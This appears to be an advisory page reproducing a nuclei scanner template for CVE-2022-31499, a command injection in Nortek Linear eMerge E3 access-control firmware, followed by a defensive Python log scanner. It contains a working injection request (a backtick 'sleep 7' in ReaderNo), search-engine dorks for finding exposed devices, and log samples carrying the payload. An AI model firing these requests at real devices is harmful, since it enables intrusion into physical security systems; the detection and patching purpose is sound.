nuclei / ProjectDiscovery / NUCLEI:CVE-2022-31499
Sep 23, 2022 - 5:28 p.m.

Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection

2022-09-23 17:28:46
ProjectDiscovery
github.com
Tags: cve2022, packetstorm, emerge, rce, nortekcontrol, command injection, vulnerability, remote attackers

CVSS2: 10 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3: 10 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score: 9.9 High
  Confidence: High

EPSS: 0.974 High
  Percentile: 99.9%

Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
id: CVE-2022-31499

info:
  name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://github.com/omarhashem123/CVE-2022-31499
    - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
    - https://eg.linkedin.com/in/omar-1-hashem
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31499
    cwe-id: CWE-78
    epss-score: 0.50608
    epss-percentile: 0.97247
    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: emerge_e3_firmware
    shodan-query:
      - title:"eMerge"
      - http.title:"emerge"
      - http.title:"linear emerge"
    fofa-query:
      - title="emerge"
      - title="linear emerge"
    google-query:
      - intitle:"linear emerge"
      - intitle:"emerge"
  tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol

http:
  - raw:
      - |
        @timeout: 15s
        GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - contains(header, "text/html")
          - status_code == 200
          - contains(body, '{\"CardNo\":false')
        condition: and
# digest: 4a0a00473045022100d058fcd6d5713b61b34f3360f00df64a693d00394039aa9b4221e2ff15fecbfd02206ac1b9afe97a8d1ab3685121c6c13be2a42f7a983916a2dc62ab0a8dabcef443:922c64590222798bb761d5b6d8e72950
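
A defender-side counterpart to the template's request, added here as an example (it is not part of the nuclei template or ProjectDiscovery's code): it scans web access-log lines for /card_scan.php requests whose ReaderNo value, once percent-decoded, contains shell metacharacters. The log lines are constructed samples, and the rule that a legitimate ReaderNo is a short decimal number is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Sep/2022:17:28:46 +0000] "GET /card_scan.php?No=123&ReaderNo=1&CardFormatNo=123 HTTP/1.1" 200 64',
    '198.51.100.7 - - [23/Sep/2022:17:29:02 +0000] "GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1" 200 64',
    '203.0.113.5 - - [23/Sep/2022:17:30:11 +0000] "GET /card_scan.php?No=123&ReaderNo=%60sleep%207%60&CardFormatNo=123 HTTP/1.1" 200 64',
    '203.0.113.5 - - [23/Sep/2022:17:30:40 +0000] "GET /index.php?ReaderNo=1 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ReaderNo is a short decimal number.
VALID_READER_NO = re.compile(r'^\d{1,6}$')
# Characters a shell treats specially (CWE-78 class), checked after decoding.
SHELL_META = re.compile(r'[`$;|&<>\n\r(){}\\]')


def suspicious_requests(lines):
    """Return (source_ip, decoded ReaderNo, reason) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/card_scan.php"):
            continue  # only the endpoint named in the template
        # parse_qs percent-decodes values, so %60 and a literal backtick match alike.
        for value in parse_qs(url.query, keep_blank_values=True).get("ReaderNo", []):
            if SHELL_META.search(value):
                hits.append((m.group("src"), value, "shell metacharacter"))
            elif not VALID_READER_NO.match(value):
                hits.append((m.group("src"), value, "non-numeric value"))
    return hits


if __name__ == "__main__":
    for src, value, reason in suspicious_requests(SAMPLE_LOG):
        print(f"{src}\tReaderNo={value!r}\t{reason}")
```

Because the flaw is an incomplete fix for CVE-2019-7256, a hit on a device reported as patched is still worth checking against the firmware version (0.32-08f or later).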